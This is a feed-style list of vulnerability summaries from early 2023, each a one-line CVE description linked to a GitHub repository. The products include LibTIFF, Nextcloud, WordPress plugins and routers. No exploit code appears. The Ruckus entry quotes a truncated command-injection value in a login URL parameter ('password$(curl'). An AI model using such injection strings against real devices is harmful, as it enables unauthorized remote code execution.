**LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3609, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0804](https://github.com/Live-Hack-CVE/CVE-2023-0804) create time: 2023-02-14T01:52:44Z

**LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3516, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0803](https://github.com/Live-Hack-CVE/CVE-2023-0803) create time: 2023-02-14T01:52:40Z

**LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3724, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0802](https://github.com/Live-Hack-CVE/CVE-2023-0802) create time: 2023-02-14T01:52:37Z

**LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6778, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0801](https://github.com/Live-Hack-CVE/CVE-2023-0801) create time: 2023-02-14T01:52:33Z

**LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3502, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0800](https://github.com/Live-Hack-CVE/CVE-2023-0800) create time: 2023-02-14T01:52:29Z

**LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3701, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0799](https://github.com/Live-Hack-CVE/CVE-2023-0799) create time: 2023-02-14T01:52:25Z

**LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3400, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0798](https://github.com/Live-Hack-CVE/CVE-2023-0798) create time: 2023-02-14T01:52:22Z

**LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6921, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0797](https://github.com/Live-Hack-CVE/CVE-2023-0797) create time: 2023-02-14T01:52:18Z

**LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3592, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0796](https://github.com/Live-Hack-CVE/CVE-2023-0796) create time: 2023-02-14T01:52:15Z

**LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3488, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0795](https://github.com/Live-Hack-CVE/CVE-2023-0795) create time: 2023-02-14T01:52:11Z

**An issue has been discovered in GitLab CE/EE affecting all versions starting from 14.0 before 15.6.7, all versions starting from 15.7 before 15.7.6, all versions starting from 15.8 before 15.8.1. It was possible to trigger a DoS attack by uploading a malicious Helm chart. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0518](https://github.com/Live-Hack-CVE/CVE-2023-0518) create time: 2023-02-14T01:52:08Z

**A vulnerability was found in juju2143 WalrusIRC 0.0.2. It has been rated as problematic. This issue affects the function parseLinks of the file public/parser.js. The manipulation of the argument text leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 0.0.3 is able to address this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10079](https://github.com/Live-Hack-CVE/CVE-2015-10079) create time: 2023-02-13T23:40:56Z

**A vulnerability was found in UDX Stateless Media Plugin 3.1.1. It has been declared as problematic. This vulnerability affects the function setup_wizard_interface of the file lib/classes/class-settings.php. The manipulation of the argument settings leads to cross site scripting. The attack can be initiated remotely. Up CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4905](https://github.com/Live-Hack-CVE/CVE-2022-4905) create time: 2023-02-13T23:41:26Z

**Open Solutions for Education, Inc openSIS Community Edition v8.0 and earlier is vulnerable to SQL Injection via CalendarModal.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45962](https://github.com/Live-Hack-CVE/CVE-2022-45962) create time: 2023-02-13T23:41:19Z

**Exposure of Sensitive Information to an Unauthorized Actor in NPM simple-get prior to 4.0.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0355](https://github.com/Live-Hack-CVE/CVE-2022-0355) create time: 2023-02-13T23:41:15Z

**A type juggling vulnerability in the component /auth/fn.php of PlaySMS v1.4.5 and earlier allows attackers to bypass authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47034](https://github.com/Live-Hack-CVE/CVE-2022-47034) create time: 2023-02-13T23:40:59Z

**Baicells Nova 436Q, Nova 430E, Nova 430I, and Neutrino 430 LTE TDD eNodeB devices with firmware through QRTB 2.12.7 are vulnerable to remote shell code exploitation via HTTP command injections. Commands are executed using pre-login execution and executed with root permissions. The following methods below have been test CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0776](https://github.com/Live-Hack-CVE/CVE-2023-0776) create time: 2023-02-13T23:42:07Z

**react-admin is a frontend framework for building browser applications on top of REST/GraphQL APIs. react-admin prior to versions 3.19.12 and 4.7.6, along with ra-ui-materialui prior to 3.19.12 and 4.7.6, are vulnerable to cross-site scripting. All React applications built with react-admin and using the ` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25572](https://github.com/Live-Hack-CVE/CVE-2023-25572) create time: 2023-02-13T23:42:03Z

**bgERP v22.31 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25241](https://github.com/Live-Hack-CVE/CVE-2023-25241) create time: 2023-02-13T23:41:59Z

**An improper SameSite Attribute vulnerability in pimCore v10.5.15 allows attackers to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25240](https://github.com/Live-Hack-CVE/CVE-2023-25240) create time: 2023-02-13T23:41:55Z

**Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. Nextcloud Server prior to 24.0.8 and 23.0.12 and Nextcloud Enterprise server prior to 24.0.8 and 23.0.12 are vulnerable to server-side request forgery (SSRF). Attackers can leverage enclosed alphanumeric payloads to bypass CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25162](https://github.com/Live-Hack-CVE/CVE-2023-25162) create time: 2023-02-13T23:41:52Z

**Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. Nextcloud Server and Nextcloud Enterprise Server prior to versions 25.0.1 24.0.8, and 23.0.12 missing rate limiting on password reset functionality. This could result in service slowdown, storage overflow, or cost impact wh CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25161](https://github.com/Live-Hack-CVE/CVE-2023-25161) create time: 2023-02-13T23:41:48Z

**Nextcloud Mail is an email app for the Nextcloud home server platform. Prior to versions 2.2.1, 1.14.5, 1.12.9, and 1.11.8, an attacker can access the mail box by ID getting the subjects and the first characters of the emails. Users should upgrade to Mail 2.2.1 for Nextcloud 25, Mail 1.14.5 for Nextcloud 22-24, Mail 1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25160](https://github.com/Live-Hack-CVE/CVE-2023-25160) create time: 2023-02-13T23:41:44Z

**Zstore v6.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24648](https://github.com/Live-Hack-CVE/CVE-2023-24648) create time: 2023-02-13T23:41:40Z

**Food Ordering System v2.0 was discovered to contain a SQL injection vulnerability via the email parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24647](https://github.com/Live-Hack-CVE/CVE-2023-24647) create time: 2023-02-13T23:41:37Z

**An arbitrary file upload vulnerability in the component /fos/admin/ajax.php of Food Ordering System v2.0 allows attackers to execute arbitrary code via a crafted PHP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24646](https://github.com/Live-Hack-CVE/CVE-2023-24646) create time: 2023-02-13T23:41:33Z

**SLIMS v9.5.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /customs/loan_by_class.php?reportView. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24086](https://github.com/Live-Hack-CVE/CVE-2023-24086) create time: 2023-02-13T23:41:29Z

**ChiKoi v1.0 was discovered to contain a SQL injection vulnerability via the load_file function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24084](https://github.com/Live-Hack-CVE/CVE-2023-24084) create time: 2023-02-13T23:41:22Z

**Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to v2.3.0-DEV. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0819](https://github.com/Live-Hack-CVE/CVE-2023-0819) create time: 2023-02-13T23:41:10Z

**Off-by-one Error in GitHub repository gpac/gpac prior to v2.3.0-DEV. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0818](https://github.com/Live-Hack-CVE/CVE-2023-0818) create time: 2023-02-13T23:41:06Z

**Buffer Over-read in GitHub repository gpac/gpac prior to v2.3.0-DEV. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0817](https://github.com/Live-Hack-CVE/CVE-2023-0817) create time: 2023-02-13T23:41:03Z

**postgres 9.40 - vulnerable to CVE-2015-0241** : [bidimensional/pgtest](https://github.com/bidimensional/pgtest) create time: 2023-02-13T22:14:02Z

**CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Full Featured CKEditor5 widget. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48110](https://github.com/Live-Hack-CVE/CVE-2022-48110) create time: 2023-02-13T21:27:16Z

**Vsourz Digital Advanced Contact form 7 DB Versions 1.7.2 and 1.9.1 is vulnerable to Cross Site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45285](https://github.com/Live-Hack-CVE/CVE-2022-45285) create time: 2023-02-13T21:27:12Z

**ConnectWise Control before 22.9.10032 (formerly known as ScreenConnect) fails to validate user-supplied parameters such as the Bin/ConnectWiseControl.Client.exe h parameter. This results in reflected data and injection of malicious code into a downloaded executable. The executable can be used to execute malicious queri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25719](https://github.com/Live-Hack-CVE/CVE-2023-25719) create time: 2023-02-13T21:27:31Z

**The cryptographic code signing process and controls on ConnectWise Control through 22.9.10032 (formerly known as ScreenConnect) are cryptographically flawed. An attacker can remotely generate or locally alter file contents and bypass code-signing controls. This can be used to execute code as a trusted application provi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25718](https://github.com/Live-Hack-CVE/CVE-2023-25718) create time: 2023-02-13T21:27:28Z

**Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25717](https://github.com/Live-Hack-CVE/CVE-2023-25717) create time: 2023-02-13T21:27:24Z

**ureport v2.2.9 was discovered to contain an arbitrary file deletion vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24188](https://github.com/Live-Hack-CVE/CVE-2023-24188) create time: 2023-02-13T21:27:20Z

**Redpanda before 22.3.12 discloses cleartext AWS credentials. The import functionality in the rpk binary logs an AWS Access Key ID and Secret in cleartext to standard output, allowing a local user to view the key in the console, or in Kubernetes logs if stdout output is collected. The fixed versions are 22.3.12, 22.2.10 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24619](https://github.com/Live-Hack-CVE/CVE-2023-24619) create time: 2023-02-13T21:27:09Z

**** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek VidiU / VidiU Mini firmware version 3.0.8 and earlier allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be recei CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37375](https://github.com/Live-Hack-CVE/CVE-2021-37375) create time: 2023-02-13T19:16:53Z

**** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Sphere all firmware versions allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37379](https://github.com/Live-Hack-CVE/CVE-2021-37379) create time: 2023-02-13T19:16:48Z

**** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Bond, Bond 2 and Bond Pro firmware version 7.3.x and earlier allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37376](https://github.com/Live-Hack-CVE/CVE-2021-37376) create time: 2023-02-13T19:16:32Z

**** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Brik firmware version 7.2.x and earlier allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37377](https://github.com/Live-Hack-CVE/CVE-2021-37377) create time: 2023-02-13T19:16:28Z

**** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Cube and Cube Pro firmware version 7.3.x and earlier allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37378](https://github.com/Live-Hack-CVE/CVE-2021-37378) create time: 2023-02-13T19:16:24Z

**Genymotion Desktop v3.3.2 was discovered to contain a DLL hijacking vulnerability that allows attackers to escalate privileges and execute arbitrary code via a crafted DLL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48077](https://github.com/Live-Hack-CVE/CVE-2022-48077) create time: 2023-02-13T19:17:08Z

**Cross-Site Request Forgery (CSRF) in OptinlyHQ Optinly – Exit Intent, Newsletter Popups, Gamification & Opt-in Forms plugin <= 1.0.15 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41134](https://github.com/Live-Hack-CVE/CVE-2022-41134) create time: 2023-02-13T19:17:04Z

**Echelon SmartServer 2.2 with i.LON Vision 2.2 stores cleartext credentials in a file, which could allow an attacker to obtain cleartext usernames and passwords of the SmartServer. If the attacker obtains the file, then the credentials could be used to control the web user interface and file transfer protocol (FTP) serv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3089](https://github.com/Live-Hack-CVE/CVE-2022-3089) create time: 2023-02-13T19:17:00Z

**Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform, and Nextcloud Office is a document collaboration app for the same platform. Nextcloud Server 24.0.x prior to 24.0.8 and 25.0.x prior to 25.0.1, Nextcloud Enterprise Server 24.0.x prior to 24.0.8 and 25.0.x prior to 25.0.1, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25159](https://github.com/Live-Hack-CVE/CVE-2023-25159) create time: 2023-02-13T19:17:24Z

**The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Prior to version 3.0, the app has an incomplete fix for a path traversal issue and is vulnerable to two bypass methods. The bypasses may lead to information disclosure when uploading the app’s internal files, and to arbitrary f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24804](https://github.com/Live-Hack-CVE/CVE-2023-24804) create time: 2023-02-13T19:17:19Z

**The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Version 2.21.1 of the ownCloud Android app is vulnerable to SQL injection in `FileContentProvider.kt`. This issue can lead to information disclosure. Two databases, `filelist` and `owncloud_database`, are affected. In version 3 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23948](https://github.com/Live-Hack-CVE/CVE-2023-23948) create time: 2023-02-13T19:17:16Z

**Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0810](https://github.com/Live-Hack-CVE/CVE-2023-0810) create time: 2023-02-13T19:17:12Z

**Control By Web X-400 devices are vulnerable to a cross-site scripting attack, which could result in private and session information being transferred to the attacker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23553](https://github.com/Live-Hack-CVE/CVE-2023-23553) create time: 2023-02-13T19:16:43Z

**Control By Web X-600M devices run Lua scripts and are vulnerable to code injection, which could allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23551](https://github.com/Live-Hack-CVE/CVE-2023-23551) create time: 2023-02-13T19:16:40Z

**The ccmweb component of Mitel MiContact Center Business server 9.2.2.0 through 9.4.1.0 could allow an unauthenticated attacker to download arbitrary files, due to insufficient restriction of URL parameters. A successful exploit could allow access to sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22854](https://github.com/Live-Hack-CVE/CVE-2023-22854) create time: 2023-02-13T19:16:36Z

**Microsoft Internet Explorer 7 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-6049. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-6048](https://github.com/Live-Hack-CVE/CVE-2015-6048) create time: 2023-02-13T19:16:20Z

**Microsoft Internet Explorer 10 and 11 allows remote attackers to gain privileges via a crafted web site, as demonstrated by a transition from Low Integrity to Medium Integrity, aka "Internet Explorer Elevation of Privilege Vulnerability." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-6051](https://github.com/Live-Hack-CVE/CVE-2015-6051) create time: 2023-02-13T19:16:16Z

**Resources required for Pluralsight lab CVE-2021-4034** : [Turzum/ps-lab-cve-2021-4034](https://github.com/Turzum/ps-lab-cve-2021-4034) create time: 2023-02-13T18:27:30Z

**Page Table Manipulation -- CVE-2021-21551** : [nanabingies/Driver-RW](https://github.com/nanabingies/Driver-RW) create time: 2022-04-26T16:25:06Z

**Resources required for Pluralsight lab CVE-2021-4034** : [Turzum/ps-lab-cve-2021-4034](https://github.com/Turzum/ps-lab-cve-2021-4034) create time: 2023-02-13T18:22:07Z

**** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Clip all firmware versions allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37374](https://github.com/Live-Hack-CVE/CVE-2021-37374) create time: 2023-02-13T18:06:24Z

**The Paid Memberships Pro WordPress plugin before 2.9.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4830](https://github.com/Live-Hack-CVE/CVE-2022-4830) create time: 2023-02-13T18:07:55Z

**The Youtube Channel Gallery WordPress plugin through 2.4 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4783](https://github.com/Live-Hack-CVE/CVE-2022-4783) create time: 2023-02-13T18:07:52Z

**The GigPress WordPress plugin before 2.3.28 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4759](https://github.com/Live-Hack-CVE/CVE-2022-4759) create time: 2023-02-13T18:07:48Z

**The WP Customer Area WordPress plugin before 8.1.4 does not have CSRF checks when performing some actions such as chmod, mkdir and copy, which could allow attackers to make a logged-in admin perform them and create arbitrary folders, copy file for example. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4745](https://github.com/Live-Hack-CVE/CVE-2022-4745) create time: 2023-02-13T18:07:44Z

**The Lightbox Gallery WordPress plugin before 0.9.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4682](https://github.com/Live-Hack-CVE/CVE-2022-4682) create time: 2023-02-13T18:07:39Z

**The TemplatesNext ToolKit WordPress plugin before 3.2.8 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4678](https://github.com/Live-Hack-CVE/CVE-2022-4678) create time: 2023-02-13T18:07:36Z

**The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 6.5 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4656](https://github.com/Live-Hack-CVE/CVE-2022-4656) create time: 2023-02-13T18:07:32Z

**The Easy PayPal Buy Now Button WordPress plugin before 1.7.4 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4628](https://github.com/Live-Hack-CVE/CVE-2022-4628) create time: 2023-02-13T18:07:28Z

**The Twenty20 Image Before-After WordPress plugin through 1.5.9 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4580](https://github.com/Live-Hack-CVE/CVE-2022-4580) create time: 2023-02-13T18:07:24Z

**The Meks Flexible Shortcodes WordPress plugin before 1.3.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4562](https://github.com/Live-Hack-CVE/CVE-2022-4562) create time: 2023-02-13T18:07:20Z

**The Rich Table of Contents WordPress plugin through 1.3.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4551](https://github.com/Live-Hack-CVE/CVE-2022-4551) create time: 2023-02-13T18:07:16Z

**The Mapwiz WordPress plugin through 1.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4546](https://github.com/Live-Hack-CVE/CVE-2022-4546) create time: 2023-02-13T18:07:12Z

**The Better Font Awesome WordPress plugin before 2.0.4 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4512](https://github.com/Live-Hack-CVE/CVE-2022-4512) create time: 2023-02-13T18:07:04Z

**The Widgets on Pages WordPress plugin through 1.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4488](https://github.com/Live-Hack-CVE/CVE-2022-4488) create time: 2023-02-13T18:06:58Z

**The Widget Shortcode WordPress plugin through 0.3.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4473](https://github.com/Live-Hack-CVE/CVE-2022-4473) create time: 2023-02-13T18:06:54Z

**The YARPP WordPress plugin through 5.30.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4471](https://github.com/Live-Hack-CVE/CVE-2022-4471) create time: 2023-02-13T18:06:50Z

**The amr shortcode any widget WordPress plugin through 4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4458](https://github.com/Live-Hack-CVE/CVE-2022-4458) create time: 2023-02-13T18:06:46Z

**The GiveWP WordPress plugin before 2.24.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4448](https://github.com/Live-Hack-CVE/CVE-2022-4448) create time: 2023-02-13T18:06:42Z

**The FL3R FeelBox WordPress plugin through 8.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4445](https://github.com/Live-Hack-CVE/CVE-2022-4445) create time: 2023-02-13T18:06:39Z

**Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40022](https://github.com/Live-Hack-CVE/CVE-2022-40022) create time: 2023-02-13T18:06:35Z

**The WP FullCalendar WordPress plugin before 1.5 does not ensure that the post retrieved via an AJAX action is public and can be accessed by the user making the request, allowing unauthenticated attackers to get the content of arbitrary posts, including draft/private as well as password-protected ones. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3891](https://github.com/Live-Hack-CVE/CVE-2022-3891) create time: 2023-02-13T18:06:31Z

**The JetWidgets For Elementor WordPress plugin through 1.0.13 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0034](https://github.com/Live-Hack-CVE/CVE-2023-0034) create time: 2023-02-13T18:07:59Z

**Pimcore is an Open Source Data & Experience Management Platform: PIM, MDM, CDP, DAM, DXP/CMS & Digital Commerce. The upload functionality for updating user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23937](https://github.com/Live-Hack-CVE/CVE-2023-23937) create time: 2023-02-13T18:06:27Z

**Incorrect Access Control issue discoverd in Cloud Disk in ASUS RT-AC68U router firmware version before 3.0.0.4.386.41634 allows remote attackers to write arbitrary files via improper sanitation on the source for COPY and MOVE operations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37315](https://github.com/Live-Hack-CVE/CVE-2021-37315) create time: 2023-02-13T15:54:43Z

**Directory Traversal vulnerability in Cloud Disk in ASUS RT-AC68U router firmware version before 3.0.0.4.386.41634 allows remote attackers to write arbitrary files via improper sanitation on the target for COPY and MOVE operations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37317](https://github.com/Live-Hack-CVE/CVE-2021-37317) create time: 2023-02-13T15:54:36Z

**Improper Input Validation in Comfast router CF-WR6110N V2.3.1 allows a remote attacker on the same network to execute arbitrary code on the target via an HTTP POST request CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45725](https://github.com/Live-Hack-CVE/CVE-2022-45725) create time: 2023-02-13T15:54:53Z

**Incorrect Access Control in Comfast router CF-WR6110N V2.3.1 allows a remote attacker on the same network to perform any HTTP request to an unauthenticated page to force the server to generate a SESSION_ID, and using this SESSION_ID an attacker can then perform authenticated requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45724](https://github.com/Live-Hack-CVE/CVE-2022-45724) create time: 2023-02-13T15:54:49Z

